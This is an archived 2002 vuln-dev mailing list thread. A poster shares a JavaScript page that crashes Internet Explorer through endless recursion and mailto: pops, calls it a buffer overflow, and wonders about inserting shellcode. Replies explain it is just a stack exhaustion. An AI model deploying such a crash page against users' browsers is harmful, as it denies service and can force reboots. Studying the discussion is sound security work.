I believe that is what I was trying to explain Matias, though more step-by-step :P -----Original Message----- From: Elan Hasson [mailto:elanat_private] Sent: 3. juni 2002 18:00 To: Thor Larholm; 'Matias Sedalo'; vuln-devat_private Subject: RE: Buffer Overflow with all versions of Internet Explorer and Javacript. Uh do you realize what is being done with that code? its the equivalent of function a(){ return b(); } function b(){ return a(); } its a fricken stack overflow. it'll happen anywhere. -----Original Message----- From: Thor Larholm [mailto:Thorat_private] Sent: Monday, June 03, 2002 7:27 AM To: 'Matias Sedalo'; vuln-devat_private Subject: RE: Buffer Overflow with all versions of Internet Explorer and Javacript. The button calls hacerMail() which ends up calling soporte() which in turn ends up calling hacerMail() as argument to the close() method. You have yourself a nice recursive function without ending, and as a side effect you are opening lots of mail messages which also exhausts ressources. -----Original Message----- From: Matias Sedalo [mailto:s0t4ipv6at_private] Sent: 2. juni 2002 23:08 To: vuln-devat_private Subject: Buffer Overflow with all versions of Internet Explorer and Javacript. the 28/07/1999 I have discovered a stack buffer overflow caused by until the moment all the versions of the Internet Explorer. In many windows98 causes the necessity to reinitiate the equipment, since to my to seem it remains without memory. Only it has been proven in several versions 5 of IE on WindowsNT server sp6 and windows98 Second Edition. As I said before the Windows 98 I had to reinitiate it to the force. Can be possible to execute arbitrary code using the variable company of the example? // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6 // internet Explorer 5.00.3500.1003 on Windows98se -----------cut here--------------------------- <html><head></head> <script language="JAVASCRIPT"> function hacerMail() { var company; crear(); address="s0t4ipv6at_private"; soporte(); } function soporte(){ var soporte="billat_private"; window.location="mailto:"+address+"?cc="+soporte+"&subject="+company; // window.location=company; // also this line cause the bof. close(hacerMail()); } function crear(){ company="shellcode here?\n"; // i don't think so. } </script> <input type="button" onClick="hacerMail();" value="SMASH!"></input> </html> -----------cut here--------------------------- Regards. - Internet es perjudicial para la salud - - Ley N~ 127.0.0.1 Matias Sedalo http://www.shellcode.com.ar s0t4ipv6at_private B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2 ........................................
This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 10:13:56 PDT